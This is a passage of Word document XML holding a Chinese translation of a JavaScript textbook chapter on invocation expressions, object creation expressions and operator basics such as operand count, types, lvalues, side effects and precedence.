        <w:t>的写法更加简单，但需要注意的是，这种方式只适用于要访问的属性名称是合法的标识符，并且需要知道要访问的属性的名字。如果属性名称是一个保留字或者包含空格和标点符号，或是一个数字（对于数组来说），则必须使用方括号的写法。当属性名是通过运算得出的值而不是固定的值的时候，这时必须使用方括号写法（具体示例参照</w:t>
      </w:r>
      <w:r>
        <w:t>6.2.1</w:t>
      </w:r>
      <w:r>
        <w:t>节）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>对象和其属性的细节会在第</w:t>
      </w:r>
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t>章涵盖。数组及其元素会在第</w:t>
      </w:r>
      <w:r>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:t>章讲述。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="71" w:name="4_5_Diao_Yong_Biao_Da_Shi_"/>
      <w:r>
        <w:t>4.5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　调用表达式</w:t>
      </w:r>
      <w:bookmarkEnd w:id="71"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中的调用表达式（</w:t>
      </w:r>
      <w:r>
        <w:t>invocation expression</w:t>
      </w:r>
      <w:r>
        <w:t>）是一种调用（或者执行）函数或方法的语法表示。它以一个函数表达式开始，这个函数表达式指代了要调用的函数。函数表达式后跟随一对圆括号，括号内是一个以逗号隔开的参数列表，参数可以有</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>个也可有多个，例如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>f(0)//f</w:t>
      </w:r>
      <w:r>
        <w:t>是一个函数表达式；</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>是一个参数表达式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Math.max(x,y,z)//Math.max</w:t>
      </w:r>
      <w:r>
        <w:t>是一个函数</w:t>
      </w:r>
      <w:r>
        <w:t>;x,y</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>z</w:t>
      </w:r>
      <w:r>
        <w:t>是参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a.sort()//a.sort</w:t>
      </w:r>
      <w:r>
        <w:t>是一个函数，它没有参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当对调用表达式进行求值的时候，首先计算函数</w:t>
      </w:r>
      <w:r>
        <w:t>表达式，然后计算参数表达式，得到一组参数值。如果函数表达式的值不是一个可调用的对象，则抛出一个类型错误异常（所有的函数都是可调用的，即使宿主对象不是函数它也有可能被调用，这里的区别将在</w:t>
      </w:r>
      <w:r>
        <w:t>8.7.7</w:t>
      </w:r>
      <w:r>
        <w:t>节讲述）。然后，实参的值被依次赋值给形参，这些形参是定义函数时指定的，接下来开始执行函数体。如果函数使用</w:t>
      </w:r>
      <w:r>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:t>语句给出一个返回值，那么这个返回值就是整个调用表达式的值。否则，调用表达式的值就是</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>。函数调用</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>包括当形参表达式的个数和函数定义中实参的个数不匹配的时候的运行情况</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>的细节将会在第</w:t>
      </w:r>
      <w:r>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t>章</w:t>
      </w:r>
      <w:r>
        <w:t>详细讨论。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>任何一个调用表达式都包含一对圆括号和左圆括号之前的表达式。如果这个表达式是一个属性访问表达式，那么这个调用称做</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>方法调用</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>method invocation</w:t>
      </w:r>
      <w:r>
        <w:t>）。在方法调用中，执行函数体的时候，作为属性访问主题的对象和数组便是其调用方法内</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>的指向。这种特性使得在面向对象编程范例中，函数（其</w:t>
      </w:r>
      <w:r>
        <w:t>OO</w:t>
      </w:r>
      <w:r>
        <w:t>名称为</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>）可以调用其宿主对象。参照第</w:t>
      </w:r>
      <w:r>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:t>章以获取更相信的信息。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>并不是方法调用的调用表达式通常使用全局对象作为</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>关键字的值。然而在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>中，那些通过严格模式定义的函数在调用</w:t>
      </w:r>
      <w:r>
        <w:t>时将使用</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>作为</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>的值，</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>不会指向全局对象。参照</w:t>
      </w:r>
      <w:r>
        <w:t>5.7.3</w:t>
      </w:r>
      <w:r>
        <w:t>节以获得更多关于严格模式的信息。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="72" w:name="4_6_Dui_Xiang_Chuang_Jian_Biao_Da_Shi_"/>
      <w:r>
        <w:t>4.6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　对象创建表达式</w:t>
      </w:r>
      <w:bookmarkEnd w:id="72"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>对象创建表达式（</w:t>
      </w:r>
      <w:r>
        <w:t>object creation expression</w:t>
      </w:r>
      <w:r>
        <w:t>）创建一个对象并调用一个函数（这个函数称做构造函数）初始化新对象的属性。对象创建表达式和函数调用表达式非常类似，只是对象创建表达式之前多了一个关键字</w:t>
      </w:r>
      <w:r>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>new Object()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>new Point(2,3)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>如果一个对象创建表达式不需要传入任何参数给构造函数的话，那么这对空圆括号是可以省略掉</w:t>
      </w:r>
      <w:r>
        <w:t>的：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>new Object</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>new Date</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当计算一个对象创建表达式的值时，和对象初始化表达式通过</w:t>
      </w:r>
      <w:r>
        <w:t>{}</w:t>
      </w:r>
      <w:r>
        <w:t>创建对象的做法一样，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>首先创建一个新的空对象，然后，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>通过传入指定的参数并将这个新对象当做</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>的值来调用一个指定的函数。这个函数可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>来初始化这个新创建对象的属性。那些被当成构造函数的函数不会返回一个值，并且这个新创建并被初始化后的对象就是整个对象创建表达式的值。如果一个构造函数确实返回了一个对象值，那么这个对象就作为整个对象创建表达式的值，而新创建的对象就废弃了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>构造函数的细节将在第</w:t>
      </w:r>
      <w:r>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:t>章讲述。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="73" w:name="4_7_Yun_Suan_Fu_Gai_Shu_"/>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>.7</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　运算符概述</w:t>
      </w:r>
      <w:bookmarkEnd w:id="73"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中的运算符用于算术表达式、比较表达式、逻辑表达式、赋值表达式等。表</w:t>
      </w:r>
      <w:r>
        <w:t>4-1</w:t>
      </w:r>
      <w:r>
        <w:t>简单列出了</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中的运算符，作为一个方便的参照。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>需要注意的是，大多数运算符都是由标点符号表示的，比如</w:t>
      </w:r>
      <w:r>
        <w:t>“+”</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>“=”</w:t>
      </w:r>
      <w:r>
        <w:t>。而另外一些运算符则是由关键字表示的，比如</w:t>
      </w:r>
      <w:r>
        <w:t>delete</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>instanceof</w:t>
      </w:r>
      <w:r>
        <w:t>。关键字运算符和标点符号所表示的运算符一样都是正规的运算符，它们的语法都非常言简意赅。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>表</w:t>
      </w:r>
      <w:r>
        <w:t>4-1</w:t>
      </w:r>
      <w:r>
        <w:t>是按照运算符的优先级排序的，前面的运算符优先级要高于后面的运算符优先级。被水平分割线分隔开来的运算符</w:t>
      </w:r>
      <w:r>
        <w:t>具有不同的优先级。标题为</w:t>
      </w:r>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>的列表示运算符的结合性，</w:t>
      </w:r>
      <w:r>
        <w:t>L</w:t>
      </w:r>
      <w:r>
        <w:t>（从左至右）或</w:t>
      </w:r>
      <w:r>
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:t>（从右至左），标题为</w:t>
      </w:r>
      <w:r>
        <w:t>N</w:t>
      </w:r>
      <w:r>
        <w:t>的列表示操作数的个数。标题为</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>类型</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>的列表示期望的操作数类型，以及运算符的结果类型（在</w:t>
      </w:r>
      <w:r>
        <w:t>“→”</w:t>
      </w:r>
      <w:r>
        <w:t>符号之后）。表</w:t>
      </w:r>
      <w:r>
        <w:t>4-1</w:t>
      </w:r>
      <w:r>
        <w:t>之后的段落会解释优先级、结合性和操作数类型的概念。表</w:t>
      </w:r>
      <w:r>
        <w:t>4-1</w:t>
      </w:r>
      <w:r>
        <w:t>只对运算符做单独讨论。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251668480" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4119113" cy="5956539"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="10" name="00010.jpeg" descr="000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00010.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4119113" cy="5956539"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="74" w:name="4_7_1_Cao_Zuo_Shu_De_Ge_Shu_"/>
      <w:r>
        <w:t>4.7.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　操作数的个数</w:t>
      </w:r>
      <w:bookmarkEnd w:id="74"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>运算符可以根据其操作数的个数进行分类。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中的大多数运算</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>符（比如</w:t>
      </w:r>
      <w:r>
        <w:t>“*”</w:t>
      </w:r>
      <w:r>
        <w:t>乘法运算符）是一个二元运算符（</w:t>
      </w:r>
      <w:r>
        <w:t>binary operator</w:t>
      </w:r>
      <w:r>
        <w:t>），将两个表达式合并成一个稍复杂的表达式。换言之，</w:t>
      </w:r>
      <w:r>
        <w:t>它们的操作数均是两个。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>同样支持一些一元运算符（</w:t>
      </w:r>
      <w:r>
        <w:t>unary operator</w:t>
      </w:r>
      <w:r>
        <w:t>），它们将一个表达式转换为另一个稍复杂的表达式。表达式</w:t>
      </w:r>
      <w:r>
        <w:t>-x</w:t>
      </w:r>
      <w:r>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t>“-”</w:t>
      </w:r>
      <w:r>
        <w:t>运算符就是一个一元运算符，是将操作数</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>求负值。最后，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>支持一个三元运算符（</w:t>
      </w:r>
      <w:r>
        <w:t>ternary operator</w:t>
      </w:r>
      <w:r>
        <w:t>），条件判断运算符</w:t>
      </w:r>
      <w:r>
        <w:t>“?:”</w:t>
      </w:r>
      <w:r>
        <w:t>，它将三个表达式合并成一个表达式。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="75" w:name="4_7_2_Cao_Zuo_Shu_Lei_Xing_He_Jie_Guo_Le"/>
      <w:r>
        <w:t>4.7.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　操作数类型和结果类型</w:t>
      </w:r>
      <w:bookmarkEnd w:id="75"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一些运算符可以作用于任何数据类型，但仍然希望它们的操作数是指定类型的数据，并且大多数运算符返回（或计算出）一个特定类型的值。在表</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>-1</w:t>
      </w:r>
      <w:r>
        <w:t>标题为</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>类型</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>的列中列出了运算符操作数的类型（箭头前）和运算结果的类型（箭头后）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>运算符通常会根据需要对操作数进行类型转换（参照</w:t>
      </w:r>
      <w:r>
        <w:t>3.8</w:t>
      </w:r>
      <w:r>
        <w:t>节）。乘法运算符</w:t>
      </w:r>
      <w:r>
        <w:t>“*”</w:t>
      </w:r>
      <w:r>
        <w:t>希望操作数为数字，但表达式</w:t>
      </w:r>
      <w:r>
        <w:t>"3"*"5"</w:t>
      </w:r>
      <w:r>
        <w:t>却是合法的，因为</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>会将操作数转换为数字。这个表达式的值是数字</w:t>
      </w:r>
      <w:r>
        <w:t>15</w:t>
      </w:r>
      <w:r>
        <w:t>，而不是字符串</w:t>
      </w:r>
      <w:r>
        <w:t>“15”</w:t>
      </w:r>
      <w:r>
        <w:t>。之前也提到过，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中的所有值不是真值就是假值，因此对于那些希望操作数是布尔类型的操作符来说，它们的操作数可以是任意类型。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>有一些运算符对操作数类型有着不同程度的依赖。最</w:t>
      </w:r>
      <w:r>
        <w:t>明显的例子是加法运算符，</w:t>
      </w:r>
      <w:r>
        <w:t>“+”</w:t>
      </w:r>
      <w:r>
        <w:t>运算符可以对数字进行加法运算，也可以对字符串作连接。同样，比如</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>比较运算符可以根据操作数类型的不同对数字进行大小值的比较，也可以比较字符在字母表中的次序先后。单个运算符的描述充分解释了它们对类型有着怎样的依赖以及对操作数进行怎样的类型转换。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="76" w:name="4_7_3_Zuo_Zhi_"/>
      <w:r>
        <w:t>4.7.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　左值</w:t>
      </w:r>
      <w:bookmarkEnd w:id="76"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>你可能会注意到，表</w:t>
      </w:r>
      <w:r>
        <w:t>4-1</w:t>
      </w:r>
      <w:r>
        <w:t>中的赋值运算符和其他少数运算符期望它们的操作数是</w:t>
      </w:r>
      <w:r>
        <w:t>lval</w:t>
      </w:r>
      <w:r>
        <w:t>类型。左值（</w:t>
      </w:r>
      <w:r>
        <w:t>lvalue</w:t>
      </w:r>
      <w:r>
        <w:t>）是一个古老的术语，它是指</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>表达式只能出现在赋值运算符的左侧</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>。在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中，变量、对象属性和数组元素</w:t>
      </w:r>
      <w:r>
        <w:t>均是左值。</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript</w:t>
      </w:r>
      <w:r>
        <w:t>规范允许内置函数返回一个左值，但自定义的函数则不能返回左值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="77" w:name="4_7_4_Yun_Suan_Fu_De_Fu_Zuo_Yong_"/>
      <w:r>
        <w:t>4.7.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　运算符的副作用</w:t>
      </w:r>
      <w:bookmarkEnd w:id="77"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>计算一个简单的表达式（比如</w:t>
      </w:r>
      <w:r>
        <w:t>2*3</w:t>
      </w:r>
      <w:r>
        <w:t>）不会对程序的运行状态造成任何影响，程序后续执行的计算也不会受到该计算的影响。而有一些表达式则具有很多副作用，前后的表达式运算会相互影响。赋值运算符是最明显的一个例子：如果给一个变量或属性赋值，那么那些使用这个变量或属性的表达式的值都会发生改变。</w:t>
      </w:r>
      <w:r>
        <w:t>“++”</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>“--”</w:t>
      </w:r>
      <w:r>
        <w:t>递增和递减运算符与此类似，因为它们包含隐式的赋值。</w:t>
      </w:r>
      <w:r>
        <w:t>delete</w:t>
      </w:r>
      <w:r>
        <w:t>运算符同样有副作用：删除一个属性就</w:t>
      </w:r>
      <w:r>
        <w:t>像（但不完全一样）给这个属性赋值</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>其他的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>运算符都没有副作用，但函数调用表达式和对象创建表达式有些特别，在函数体或者构造函数内部运用了这些运算符并产生了副作用的时候，我们说函数调用表达式和对象创建表达式是有副作用的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="78" w:name="4_7_5_Yun_Suan_Fu_You_Xian_Ji_"/>
      <w:r>
        <w:t>4.7.5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　运算符优先级</w:t>
      </w:r>
      <w:bookmarkEnd w:id="78"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>表</w:t>
      </w:r>
      <w:r>
        <w:t>4-1</w:t>
      </w:r>
      <w:r>
